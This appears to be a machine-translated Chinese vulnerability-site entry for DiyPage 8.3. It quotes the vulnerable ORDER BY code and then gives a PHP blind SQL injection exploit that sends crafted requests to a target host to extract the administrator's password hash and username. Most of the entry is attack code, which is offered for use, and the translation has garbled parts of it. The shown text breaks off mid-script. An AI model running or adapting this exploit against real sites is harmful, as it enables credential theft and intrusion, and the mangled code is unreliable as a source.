DiyPage8. 3 orderby injection and code execution vulnerabilities-vulnerability warning-the black bar safety net

2011-12-15T00:00:00
ID MYHACK58:62201132598
Type myhack58
Reporter 佚名
Modified 2011-12-15T00:00:00

Description

UPDATE: there is a large cattle say the EXP is bad so didn't want to explain please you with the time to spend a few seconds to look at the EXP code

Here to fill the search keywords and the injection determination keywords

As for what to look for I don't want to say too clear as long as you take the time to look through the code to naturally find

mod\dpcms\js\searchsubmit.php

Paragraph 3 line 6

$srchorder= $_GET['srchorder'] ? $_GET['srchorder'] : 'eid';

Paragraph 5 line 2

$sql='SELECT eid,builddate,title,author,content';

$sql.=' FROM '. DP_DBPREFIX.'cms_entry WHERE active=1 AND';

。。。。。。

。。。。。。。。。。。

$sql.=' ORDER BY '.$ srchorder.' '.$ ascdesc;

$sql.=' LIMIT '.$ offset.','.$ srchtotal;

$query=$db->query($sql);

Pork points in order by back and no error echo can only blind

EXP: a reference to the Flyh4t code

<?

print_r('

--------------------------------------------------------------------------------

DiyPage8. 3 js.php orderby blind SQL injection exploit

BY xZL && amp; large Cicada

Team: http://www.0kee.com

Thx for Flyh4t

--------------------------------------------------------------------------------

');

if ($argc<3) {

print_r('

--------------------------------------------------------------------------------

Usage: php '.$ argv[0].' host path

host: target server (ip/hostname)

path: path to Diypage

Example:

php '.$ argv[0].' localhost /

--------------------------------------------------------------------------------

');

die;

}

function sendpacketii($packet)

{

global $host, $html;

$ock=fsockopen(gethostbyname($host),'8 0');

if (!$ ock) {

echo 'No response from '.$ host; die;

}

fputs($ock,$packet);

$html=";

while (! feof($ock)) {

$html.= fgets($ock);

}

fclose($ock);

}

$host=$argv[1];

$path=$argv[2];

$prefix="dp_"; //table prefix

$search_keywords=""; //search keywords

$inject_keywords=""; //inject the keyword(the normal page)

$cookie="";

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))

{echo 'Error... check the path!'; die;}

$chars[0]=0;//null

$chars=array_merge($chars,range(48,57)); //numbers

$chars=array_merge($chars,range(97,102));//a-f letters

echo "[~]exploting now,plz waiting\r\n";

/get password/

$j=1;$password="";

while (! strstr($password,chr(0)))

{

for ($i=0; $i<=2 5 5; $i++)

{

if (in_array($i,$chars))

{

$sql="srchorder=1+and+If(ASCII(SUBSTRING((SELECT+password+FROM+".$ prefix."user_list+where+gid=2),".$ j.", 1))=".$ i.", 1,(SELECT+password+FROM+".$ prefix."user_list))%2 3";

$packet ="GET ".$ path."js. php? mod=dpcms&name=searchsubmit&srchperpage=1 0&keywords=$search_keywords&".$ sql." HTTP/1.0\r\n";

$packet.=" Host: ".$ host."\ r\n";

$packet.=" Cookie: ".$ cookie."\ r\n";

$packet.=" Connection: Close\r\n\r\n";

sendpacketii($packet);

if (eregi($inject_keywords,$html)) {$password.= chr($i);echo"[+]password:".$ password."\ r\n";break;}

}

if ($i==2 5 5) {die("Exploit failed...");}

}

$j++;

}

/get userid/

$j=1;$admin="";

while (! strstr($admin,chr(0)))

{

for ($i=0; $i<=2 5 5; $i++)

{

$sql="srchorder=1+and+If(ASCII(SUBSTRING((SELECT+username+FROM+".$ prefix."user_list+where+gid=2),".$ j.", 1))=".$ i.", 1,(SELECT+username+FROM+".$ prefix."user_list))%2 3";

$packet ="GET ".$ path."js. php? mod=dpcms&name=searchsubmit&srchperpage=1 0&keywords=$search_keywords&".$ sql." HTTP/1.0\r\n";

$packet.=" Host: ".$ host."\ r\n";

$packet.=" Cookie: ".$ cookie."\ r\n";

$packet.=" Connection: Close\r\n\r\n";

sendpacketii($packet);

[1] [2] next